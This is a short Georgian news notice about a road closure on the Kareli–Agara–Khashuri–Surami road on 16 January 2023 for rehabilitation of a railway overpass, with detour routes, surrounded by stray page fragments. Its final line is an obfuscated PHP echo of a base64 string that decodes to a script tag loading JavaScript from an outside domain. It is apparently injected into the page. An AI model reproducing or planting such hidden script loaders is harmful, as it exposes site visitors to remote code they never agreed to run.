celsiusi
ავერსი საქკაბელი

საავტომობილო გზების დეპარტამენტის ინფორმაციით, საქართველოს საავტომობილო გზების დეპარტამენტთან გაფორმებული ხელშეკრულების საფუძველზე, შპს „საქართველოს სამშენებლო კომპანია“ აწარმოებს შიდასახელმწიფოებრივი მნიშვნელობის ქარელი (სატრანსპორტო კვანძი) - აგარა - ხაშური - სურამის (სატრანსპორტო კვანძი) საავტომობილო გზაზე არსებული რკინიგზის გზაგამტარის სარეაბილიტაციო სამუშაოებს. აღნიშნული სამუშაოების ფარგლებში, 2023 წლის 16 იანვარს 09:00 სთ-დან 18:00 სთ-მდე, იკრძალება ყველა სახის ავტოტრანსპორტის მოძრაობა.

დროის აღნიშნულ პერიოდში მსუბუქი ავტოტრანსპორტი იმოძრავებს ქ. სურამის გავლით, ხოლო მისაბმელიანი და ნახევრადმისაბმელიანი ავტოტრანსპორტი იმოძრავებს სურამის სატრანსპორტო კვანძიდან აგარის სატრანსპორტო კვანძამდე და ქ. ხაშურის გავლით ბორჯომის მიმართულებით და პირიქით.
311
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");